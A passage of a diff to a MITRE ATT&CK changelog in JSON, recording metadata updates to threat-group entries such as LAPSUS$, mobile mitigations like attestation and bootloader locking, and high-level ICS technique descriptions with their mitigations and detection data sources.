"enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:56:33.318000+00:00\", \"old_value\": \"2024-10-10 14:31:35.326000+00:00\"}}}", + "previous_version": "4.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-27 16:55:39.688000+00:00", + "modified": "2025-04-25 14:41:32.241000+00:00", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "aliases": [ + "Bouncing Golf" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097", 
+ "external_id": "G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:41:32.241000+00:00\", \"old_value\": \"2025-04-16 21:22:02.103000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 19:14:31.327000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "LAPSUS$", + "description": "[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. 
The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)", + "aliases": [ + "LAPSUS$", + "DEV-0537", + "Strawberry Tempest" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1004", + "external_id": "G1004" + }, + { + "source_name": "Strawberry Tempest", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "DEV-0537", + "description": "(Citation: MSTIC DEV-0537 Mar 2022)" + }, + { + "source_name": "BBC LAPSUS Apr 2022", + "description": "BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.", + "url": "https://www.bbc.com/news/technology-60953527" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "MSTIC DEV-0537 Mar 2022", + "description": "MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + }, + { + "source_name": "UNIT 42 LAPSUS Mar 2022", + "description": "UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. 
Retrieved May 17, 2022.", + "url": "https://unit42.paloaltonetworks.com/lapsus-group/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Hughes, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Caio Silva" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-07 14:44:59.715000+00:00\"}, \"root['x_mitre_contributors'][2]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "2.1" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "course-of-action", + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:50:35.335000+00:00", + "modified": "2025-04-25 14:40:12.762000+00:00", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android 
SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1002", + "external_id": "M1002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:12.762000+00:00\", \"old_value\": \"2025-04-16 21:22:19.448000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:52.601000+00:00", + "modified": "2025-04-25 14:40:12.032000+00:00", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. 
Some methods may be trivial to evade while others may be more sophisticated.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:12.032000+00:00\", \"old_value\": \"2025-04-16 21:22:19.136000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:50.769000+00:00", + "modified": "2025-04-25 14:40:10.924000+00:00", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. 
Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. 
Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:10.924000+00:00\", \"old_value\": \"2025-04-16 21:22:18.668000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:53.318000+00:00", + "modified": "2025-04-25 14:40:09.487000+00:00", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:09.487000+00:00\", \"old_value\": \"2025-04-16 21:22:18.032000+00:00\"}}}", + "previous_version": "1.0" + }, + { 
+ "type": "course-of-action", + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:49.554000+00:00", + "modified": "2025-04-25 14:40:11.299000+00:00", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:11.299000+00:00\", \"old_value\": \"2025-04-16 21:22:18.821000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:51:36.488000+00:00", + "modified": "2025-04-25 14:40:11.661000+00:00", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn 
Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1001", + "external_id": "M1001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:11.661000+00:00\", \"old_value\": \"2025-04-16 21:22:18.982000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:52.270000+00:00", + "modified": "2025-04-25 14:40:10.556000+00:00", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, 
\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:10.556000+00:00\", \"old_value\": \"2025-04-16 21:22:18.484000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:51.657000+00:00", + "modified": "2025-04-25 14:40:08.756000+00:00", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:08.756000+00:00\", \"old_value\": \"2025-04-16 21:22:17.864000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:53:03.508000+00:00", + "modified": "2025-04-25 14:40:09.845000+00:00", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set 
particular configuration settings or avoid specific potentially risky behaviors.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1011", + "external_id": "M1011" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:09.845000+00:00\", \"old_value\": \"2025-04-16 21:22:18.181000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "ics-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:44.679000+00:00", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process 
malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:44.679000+00:00\", \"old_value\": \"2025-04-16 21:26:10.552000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0800: Authorization Enforcement", + "M0801: Access Management", + "M0802: Communication Authenticity", + "M0804: Human User Authentication", + "M0807: Network Allowlists", + "M0813: Software Process and Device Authentication", + "M0930: Network Segmentation", + "M0937: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + 
"changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0040: Operational Databases (Device Alarm)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:47.841000+00:00", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Modification", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Deletion", + "File: File Modification", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:47.841000+00:00\", 
\"old_value\": \"2025-04-16 21:26:14.295000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0922: Restrict File and Directory Permissions" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Deletion)", + "DS0022: File (File Metadata)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Deletion)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:45.982000+00:00", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. 
The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:45.982000+00:00\", \"old_value\": \"2025-04-16 21:26:12.337000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0816: Mitigation Limited or Not Effective" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:46.293000+00:00", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. 
Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:46.293000+00:00\", \"old_value\": \"2025-04-16 21:26:12.867000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0800: Authorization Enforcement", + "M0801: Access Management", + "M0802: Communication Authenticity", + "M0804: Human User Authentication", + "M0807: Network Allowlists", + "M0813: Software Process and Device Authentication", + "M0930: Network Segmentation", + "M0937: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic 
Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:51.447000+00:00", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 
2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:51.447000+00:00\", \"old_value\": \"2025-04-16 21:26:18.404000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0816: Mitigation Limited or Not Effective" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:52.173000+00:00", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control 